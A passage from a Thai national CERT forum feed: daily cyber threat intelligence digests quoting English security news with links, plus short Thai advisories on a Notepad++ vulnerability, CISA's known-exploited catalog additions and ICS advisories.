        https://www.infosecurity-magazine.com/news/hawaiian-airlines-cybersecurity/
        https://www.theregister.com/2025/06/27/aloha_youve_been_pwned_hawaiian/
      • Retail Giant Ahold Delhaize Says Data Breach Affects 2.2 Million People
        "Ahold Delhaize, one of the world's largest food retail chains, is notifying over 2.2 million individuals that their personal, financial, and health information was stolen in a November ransomware attack that impacted its U.S. systems. The multinational retailer and wholesale company operates over 9,400 local stores across Europe, the United States, and Indonesia, employing more than 393,000 people and serving approximately 60 million customers each week in-store and online."
        https://www.bleepingcomputer.com/news/security/retail-giant-ahold-delhaize-says-data-breach-affects-22-million-people/
        https://therecord.media/hackers-cyberattack-grocery-chain
        https://www.bankinfosecurity.com/food-retail-giants-breach-22-million-employees-affected-a-28842
        https://www.theregister.com/2025/06/27/ahold_delhaize_breach/

      General News

      • Money Mule Networks Evolve Into Hierarchical, Business-Like Criminal Enterprises
        "In this Help Net Security interview, Michal Tresner, CEO of ThreatMark, discusses how cybercriminals are weaponizing AI, automation, and social engineering to industrialize money mule operations. He looks at how these networks have changed and how behavioral intelligence is helping to catch fraud. Tresner also shares practical tips for CISOs trying to stop mule activity before it gets out of hand."
        https://www.helpnetsecurity.com/2025/06/27/michal-tresner-threatmark-money-mule-networks/
      • After a Hack Many Firms Still Say Nothing, And That’s a Problem
        "Attackers are more inclined to “log in rather than break in,” using stolen credentials, legitimate tools, and native access to stealthily blend into their target’s environment, according to Bitdefender’s 2025 Cybersecurity Assessment Report. 68% of security leaders are focusing on reducing the number of tools and applications running in their environments. Why? Because every unused admin account, unnecessary app, or extra permission is a potential doorway for attackers, and a place for them to hide once they’re in. By turning off what’s not needed, organizations give attackers fewer options."
        https://www.helpnetsecurity.com/2025/06/27/cybersecurity-risk-reduction-breach-transparency/
      • We Know GenAI Is Risky, So Why Aren’t We Fixing Its Flaws?
        "Even though GenAI threats are a top concern for both security teams and leadership, the current level of testing and remediation for LLM and AI-powered applications isn’t keeping up with the risks, according to Cobalt. Pentesting data from the report highlights a troubling reality: LLM applications often have serious security vulnerabilities. These high-risk issues appear more frequently in LLMs than in any other type of system, showing that LLM deployments carry a particularly elevated risk."
        https://www.helpnetsecurity.com/2025/06/27/cobalt-research-llm-security-vulnerabilities/
      • Vulnerability Debt: How Do You Put a Price On What To Fix?
        "As defined by the UK National Cyber Security Centre, a vulnerability is "a weakness in an IT system that can be exploited by an attacker to deliver a successful attack. They can occur through flaws, features or user error, and attackers will look to exploit any of them, often combining one or more, to achieve their end goal.""
        https://www.darkreading.com/vulnerabilities-threats/vulnerability-debt-fix-price

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) ba48dbbf-55d7-44b7-a0c6-cc2fef94c242-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ช่องโหว่ความรุนแรงสูงใน Notepad++

      เมื่อวันที่ 30 มิถุนายน 2568 Cyber Security Agency of Singapore (CSA) ได้เผยแพร่เกี่ยวกับ Notepad++ ได้ออกอัปเดตด้านความปลอดภัยเพื่อแก้ไขช่องโหว่ที่ส่งผลกระทบต่อผลิตภัณฑ์ ขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบ อัปเดตเป็นเวอร์ชันล่าสุดโดยเร็ว

      Notepad++ ได้ออกอัปเดตด้านความปลอดภัยเพื่อแก้ไขช่องโหว่หมายเลข CVE-2025-49144 ที่มีผลกระทบต่อผลิตภัณฑ์ โดยในขณะนี้ มีการเปิดเผยโค้ดทดสอบการเจาะระบบ (Proof-of-Concept) สำหรับช่องโหว่นี้ต่อสาธารณะแล้ว

      ผลกระทบ
      หากผู้ไม่หวังดีสามารถเจาะระบบผ่านช่องโหว่นี้ได้สำเร็จ
      อาจทำให้ผู้โจมตีที่มีสิทธิ์เข้าถึงในระดับต่ำ สามารถยกระดับสิทธิ์ของตน (Privilege Escalation) โดยการรันไฟล์ที่ถูกออกแบบมาอย่างเป็นอันตรายด้วยสิทธิ์ระดับระบบ (System-level Privileges) ซึ่งอาจนำไปสู่การยึดครองระบบที่ได้รับผลกระทบโดยสมบูรณ์

      ผลิตภัณฑ์ที่ได้รับผลกระทบ
      ช่องโหว่นี้มีผลกระทบต่อ Notepad++ เวอร์ชัน 8.8.1 และก่อนหน้านี้

      แนวทางการแก้ไข
      ขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบ อัปเดตเป็นเวอร์ชันล่าสุดโดยทันที

      อ้างอิง
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-063/

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand b8f3faf2-4018-43b1-b121-5f5749f464af-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • LapDogs แคมเปญจารกรรมไซเบอร์ที่เชื่อมโยงกับจีน แฮกอุปกรณ์ SOHO กว่า 1,000 เครื่องทั่วโลก

      70d23830-5317-4811-ba84-be760efc8d6a-image.png

      LapDogs แคมเปญจารกรรมไซเบอร์ที่เชื่อมโยงกับจี.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand e9181722-ea06-469b-930d-6e281b826388-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ฝรั่งเศสจับกุมสมาชิกระดับสูงของ BreachForums ที่ใช้การซื้อขายข้อมูลรั่วไหล

      dc8cb549-ee9b-4d1c-ae29-bd20ec795bc0-image.png

      ฝรั่งเศสจับกุมสมาชิกระดับสูงของ BreachForums  ที่.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand c7196a38-c58a-40ea-a967-2f4d5264c6da-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA เพิ่มช่องโหว่ที่ถูกใช้ประโยชน์ที่ทราบแล้ว 3 รายการลงในแค็ตตาล็อก

      เมื่อวันที่ 25 มิถุนาย 2568 Cybersecurity and Infrastructure Security Agency (CISA) ได้มีการเผยแพร่การเพิ่มช่องโหว่ใหม่ 2 รายการในแค็ตตาล็อก ช่องโหว่อาจเป็นที่รู้จักของกลุ่มแฮกเกอร์ ซึ่งการเพิ่มนี้ขึ้นอยู่กับข้อมูลของการแสวงหาผลประโยชน์จากการโจมตีช่องโหว่ดังกล่าวนั้นได้ ช่องโหว่เหล่านี้เป็นการโจมตีบ่อยครั้งสำหรับผู้ที่ไม่ประสงค์ดีด้านภัยคุกคามทางไซเบอร์และก่อให้เกิดความเสี่ยงที่สำคัญต่อองค์กรนั้นได้ มีรายละเอียดดังนี้

      • CVE-2024-54085 AMI MegaRAC SPx Authentication Bypass by Spoofing Vulnerability
      • CVE-2024-0769 D-Link DIR-859 Router Path Traversal Vulnerability
      • CVE-2019-6693 Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability

      อ้างอิง
      https://www.cisa.gov/news-events/alerts/2025/06/25/cisa-adds-three-known-exploited-vulnerabilities-catalog
      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand ec13bb37-213b-448d-a992-881c4ed46e8b-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 2 รายการ

      Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 2 รายการ เมื่อวันที่ 26 มิถุนายน 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้

      • ICSA-25-177-01 Mitsubishi Electric Air Conditioning Systems
      • ICSA-25-177-02 TrendMakers Sight Bulb Pro

      ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/06/26/cisa-releases-two-industrial-control-systems-advisories

      อ้างอิง
      https://www.cisa.gov/news-events/alerts/2025/06/26/cisa-releases-two-industrial-control-systems-advisories
      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 79cf6318-8d08-4674-9f78-1906350868c9-image.png

      โพสต์ใน OT Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 8 รายการ

      Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 8 รายการ เมื่อวันที่ 24 มิถุนายน 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้

      • ICSA-25-175-01 Kaleris Navis N4 Terminal Operating System
      • ICSA-25-175-02 Delta Electronics CNCSoft
      • ICSA-25-175-03 Schneider Electric Modicon Controllers
      • ICSA-25-175-04 Schneider Electric EVLink WallBox
      • ICSA-25-175-05 ControlID iDSecure On-Premises
      • ICSA-25-175-06 Parsons AccuWeather Widget
      • ICSA-25-175-07 MICROSENS NMP Web+
      • ICSA-19-029-02 Mitsubishi Electric MELSEC-Q Series PLCs (Update B)

      ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/06/24/cisa-releases-eight-industrial-control-systems-advisories

      อ้างอิง
      https://www.cisa.gov/news-events/alerts/2025/06/24/cisa-releases-eight-industrial-control-systems-advisories

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 52707fec-0704-4d7e-abd3-e7d835644fac-image.png

      โพสต์ใน OT Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 27 June 2025

      Industrial Sector

      • Mitsubishi Electric Air Conditioning Systems
        "Successful exploitation of this vulnerability could allow an attacker to control the air conditioning system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-177-01
      • A Brief Overview Of The Main Incidents In Industrial Cybersecurity. Q1 2025
        "In Q1 2025, 118 incidents were publicly confirmed by victims. All of these incidents are included in the table at the end of the overview, with select incidents described in detail. This quarter, organizations from multiple industrial sectors around the world reported serious incidents caused by cyberattacks. These attacks resulted in the loss of confidential data and the interruption of IT services and key operational processes, including the production and supply of products. The most high-profile story of the quarter was undoubtedly the attack on Kuala Lumpur airport, which knocked out many of its information systems, including departure and arrival boards, check-in terminals and baggage handling systems, for 10 hours."
        https://ics-cert.kaspersky.com/publications/reports/2025/06/26/a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity-q1-2025/
      • TrendMakers Sight Bulb Pro
        "Successful exploitation of these vulnerabilities could allow an attacker to capture sensitive information and execute arbitrary shell commands on the target device as root if connected to the local network segment."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-177-02

      New Tooling

      • Kanister: Open-Source Data Protection Workflow Management Tool
        "Kanister is an open-source tool that lets domain experts define how to manage application data using blueprints that are easy to share and update. It handles the complex parts of running these tasks on Kubernetes and gives a consistent way to manage different applications at scale."
        https://www.helpnetsecurity.com/2025/06/26/kanister-open-source-data-protection-workflow-management-tool/
        https://github.com/kanisterio/kanister

      Vulnerabilities

      • Decrement By One To Rule Them All: AsIO3.sys Driver Exploitation
        "Armory Crate and AI Suite are applications used to manage and monitor ASUS motherboards and related components such as the processor, RAM or the increasingly popular RGB lighting. These types of applications often install drivers in the system, which are necessary for direct communication with hardware to configure settings or retrieve critical parameters such as CPU temperature, fan speeds and firmware updates. Therefore, it is critical to ensure that drivers are well-written with security in mind and designed such that access to the driver interfaces are limited only to certain services and administrators."
        https://blog.talosintelligence.com/decrement-by-one-to-rule-them-all/
      • Marketplace Takeover: How We Could’ve Taken Over Every Developer Using a VSCode Fork; Putting Millions At Risk
        "We discovered a critical vulnerability in open-vsx.org, the open-source VS Code extensions marketplace powering popular VSCode forks like Cursor, Windsurf and VSCodium, used by over 8,000,000 developers. This vulnerability provides attackers full control over the entire extensions marketplace, and in turn, full control over millions of developer machines. By exploiting a CI issue a malicious actor could publish malicious updates to every extension on Open VSX. One bug. Full marketplace takeover. Millions of developers and their organizations — compromised. If you control the extensions, you control the machine, the code, and the business."
        https://blog.koi.security/marketplace-takeover-how-we-couldve-taken-over-every-developer-using-a-vscode-fork-f0f8cf104d44
        https://thehackernews.com/2025/06/critical-open-vsx-registry-flaw-exposes.html

      Malware

      • Ongoing Campaign Abuses Microsoft 365’s Direct Send To Deliver Phishing Emails
        "Varonis’ Managed Data Detection and Response (MDDR) Forensics team has uncovered a novel phishing campaign targeting more than 70 organizations. In this post, we dive into the specifics to help you better understand what happened, how to detect the attack and how to prevent it moving forward. This campaign exploits a lesser-known feature in Microsoft 365: Direct Send. Designed to allow internal devices like printers to send emails without authentication, Varonis warns that threat actors are abusing the feature to spoof internal users and deliver phishing emails without ever needing to compromise an account. Identified victims spanned multiple verticals and locations but were predominantly US-based organizations."
        https://www.varonis.com/blog/direct-send-exploit
        https://www.bleepingcomputer.com/news/security/microsoft-365-direct-send-abused-to-send-phishing-as-internal-users/
      • Surge In MOVEit Transfer Scanning Could Signal Emerging Threat Activity
        "GreyNoise has identified a notable surge in scanning activity targeting MOVEit Transfer systems, beginning on May 27, 2025. Prior to this date, scanning was minimal — typically fewer than 10 IPs observed per day. But on May 27, that number spiked to over 100 unique IPs, followed by 319 IPs on May 28. Since that initial jump, daily scanner IP volume has remained intermittently elevated between 200 to 300 IPs per day — a significant deviation from baseline and an indicator that MOVEit Transfer is once again in the crosshairs."
        https://www.greynoise.io/blog/surge-moveit-transfer-scanning-activity
        https://www.bankinfosecurity.com/scans-probing-for-moveit-systems-may-be-precursor-to-attacks-a-28832
      • CapCut Con: Apple Phishing & Card-Stealing Refund Ruse
        "As CapCut continues to dominate the short-form video editing scene, cybercriminals are seizing the opportunity to exploit its popularity. In a recent phishing campaign observed by the Cofense PDC team, threat actors have crafted convincing fake CapCut invoice lures (Figure 1) designed to harvest Apple ID credentials along with credit card information. By leveraging the app's widespread appeal and mimicking its official branding, these attackers aim to deceive users into divulging sensitive information. This blog post delves into the mechanics of this phishing scheme, highlights the tactics used, and provides insights on how to recognize and avoid such threats."
        https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse

      Breaches/Hacks/Leaks

      • Central Kentucky Radiology Data Breach Impacts 167,000
        "Radiology services provider Central Kentucky Radiology (CKR) is notifying roughly 167,000 people that their personal information was compromised in an October 2024 data breach. The incident, the organization says, was discovered after certain systems within its network were disrupted by a cyberattack. CKR determined that a threat actor had access to its network between October 16 and October 18, 2024, and copied files from its systems."
        https://www.securityweek.com/central-kentucky-radiology-data-breach-impacts-167000/

      General News

      • Building Cyber Resilience In Always-On Industrial Environments
        "In this Help Net Security interview, Dr. Tim Sattler, CISO at Jungheinrich, discusses the cybersecurity risks tied to smart warehouses and industrial control systems. He explains how to maintain operational continuity while building real cyber resilience in always-on environments. Dr. Sattler also shares practical strategies for working with third-party partners and preparing for the next wave of automation."
      • **https://www.helpnetsecurity.com/2025/06/26/tim-sattler-jungheinrich-industrial-environments-cybersecurity/
      • Introducing CC Signals: A New Social Contract For The Age Of AI**
        "Creative Commons (CC) today announces the public kickoff of the CC signals project, a new preference signals framework designed to increase reciprocity and sustain a creative commons in the age of AI. The development of CC signals represents a major step forward in building a more equitable, sustainable AI ecosystem rooted in shared benefits. This step is the culmination of years of consultation and analysis. As we enter this new phase of work, we are actively seeking input from the public."
        https://creativecommons.org/2025/06/25/introducing-cc-signals-a-new-social-contract-for-the-age-of-ai/
        https://www.helpnetsecurity.com/2025/06/26/cc-signals-ai-boundaries/
      • When Synthetic Identity Fraud Looks Just Like a Good Customer
        "People may assume synthetic identity fraud has no victims. They believe fake identities don’t belong to real people, so no one gets hurt. But this assumption is wrong. Criminals create fake identities by combining stolen pieces of personal information such as Social Security numbers, names, and birthdates. This type of fraud is often called Frankenstein fraud because it stitches together real and fake components to form a new, convincing identity."
        https://www.helpnetsecurity.com/2025/06/26/synthetic-identity-fraud-consequences/
      • Most AI And SaaS Apps Are Outside IT’s Control
        "60% of enterprise SaaS and AI applications operate outside IT’s visibility, according to CloudEagle.ai. This surge in invisible IT is fueling a crisis in AI identity governance, leading to increased breaches, audit failures, and compliance risk across enterprises. A survey of 1,000 enterprise CIOs and CISOs shows a shift: most security breaches now start inside the organization. The main problems are too many user permissions, unused accounts, and poor identity management. Manual onboarding, rare access checks, and disconnected offboarding make things worse."
        https://www.helpnetsecurity.com/2025/06/26/ai-identity-governance/
      • Ex-Student Charged Over Hacking University For Cheap Parking, Data Breaches
        "New South Wales police in Australia have arrested a 27-year-old former Western Sydney University (WSU) student for allegedly hacking into the University's systems on multiple occasions, starting with a scheme to obtain cheaper parking. Specifically, the woman, identified by local media reports as Birdie Kingston, is accused of unauthorized access, data theft, and compromising university infrastructure since 2021, affecting hundreds of staff and students. "Since 2021, Western Sydney University experienced a series of cyber hacks involving unauthorized access, data exfiltration, system compromise, and misuse of university infrastructure – including threatening the sale of student information on the dark web," reads the NSW Police press release."
        https://www.bleepingcomputer.com/news/security/ex-student-charged-over-hacking-university-for-cheap-parking-data-breaches/
      • Man Pleads Guilty To Hacking Networks To Pitch Security Services
        "A Kansas City man has pleaded guilty to hacking multiple organizations to advertise his cybersecurity services, the U.S. Department of Justice announced on Wednesday. 32-year-old Nicholas Michael Kloster was indicted last year for hacking into the networks of three organizations in 2024, including a health club and a Missouri nonprofit corporation. According to court documents, Kloster accessed the systems of a health club that operates multiple gyms in Missouri after breaching a restricted area. Next, he sent an email to one of the gym chain's owners, claiming he had hacked their network and offering his services in the same message, seemingly seeking to secure a cybersecurity consulting contract with the company."
        https://www.bleepingcomputer.com/news/security/man-pleads-guilty-to-hacking-networks-to-pitch-security-services/
        https://www.securityweek.com/man-who-hacked-organizations-to-advertise-security-services-pleads-guilty/
      • The AI Arms Race: When Attackers Leverage Cutting-Edge Tech
        "For too long, the narrative around AI in cyber security has focused on its defensive capabilities. While AI is revolutionizing how organizations protect themselves – bringing unprecedented speed, accuracy, and automation – it’s crucial to acknowledge the other side of the coin. Cyber criminals are quickly embracing AI, using large language models (LLMs) and advanced agentic AI to craft more potent and elusive attacks."
        https://blog.checkpoint.com/infinity-global-services/the-ai-arms-race-when-attackers-leverage-cutting-edge-tech/
      • How Geopolitical Tensions Are Shaping Cyber Warfare
        "As global conflicts intensify, cyberspace is becoming just as contentious as the physical world. Digital frontlines are expanding rapidly, with nation-state-backed actors launching attacks against governments, infrastructure, finance, and private enterprise. What's changing isn't just the scale; it's also the focus. Today's adversaries adapt faster and act smarter, blending old tactics with new delivery methods and exploiting the same weaknesses that have gone unpatched for years. Cybersecurity professionals don't just need more data; they need to know what's happening in their neighborhood."
        https://www.darkreading.com/vulnerabilities-threats/geopolitical-tensions-shape-cyber-warfare
      • Cloud Repatriation Driven By AI, Cost, And Security
        "The acceleration of artificial intelligence (AI) has changed the way many enterprises are run, with the technology automating business processes and executing business queries. So it's not a huge surprise that AI is also transforming how companies use their cloud infrastructures. The focus on cloud migration over the past few years is plateauing as many organizations begin to embrace cloud repatriation — moving data, assets, and workloads out of the cloud and back to the data center. The difference is that organizations may not be going back to on-premises but rather to a private cloud or a hybrid cloud. Continued concerns about security in the cloud and a soaring price tag are also driving the cloud repatriation trend."
        https://www.darkreading.com/cloud-security/cloud-repatriation-ai-cost-security
      • Taming Agentic AI Risks Requires Securing Non-Human Identities
        "From service accounts and Web application programming interfaces (APIs) to serverless applications and now artificial intelligence (AI) agents, the landscape of non-human identities is quickly becoming more complex. Companies are struggling to monitor and manage machine identities with security controls. In the past, machine identities focused on devices, services, and workloads. Developers connected their applications to online application programming interfaces (API) with a secret key or token. More complex applications integrate data from numerous applications through APIs."
        https://www.darkreading.com/cybersecurity-operations/taming-agentic-ai-risks-securing-nhi
      • ESET Threat Report H1 2025
        "From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring. One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry. Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS."
        https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/
        https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf
        https://thehackernews.com/2025/06/new-filefix-method-emerges-as-threat.html
        https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/
        https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/
      • Qilin Ransomware Attack On NHS Supplier Contributed To Patient Fatality
        "The NHS says Qilin's ransomware attack on pathology services provider Synnovis last year led to the death of a patient. King's College Hospital NHS Trust, one of the many trusts affected by Qilin's attack, confirmed the news on Wednesday. An NHS spokesperson told The Register: "One patient sadly died unexpectedly during the cyberattack. As is standard practice when this happens, we undertook a detailed review of their care."
        https://www.theregister.com/2025/06/26/qilin_ransomware_nhs_death/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) 82ba04df-ffab-437d-b378-382a6b940797-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT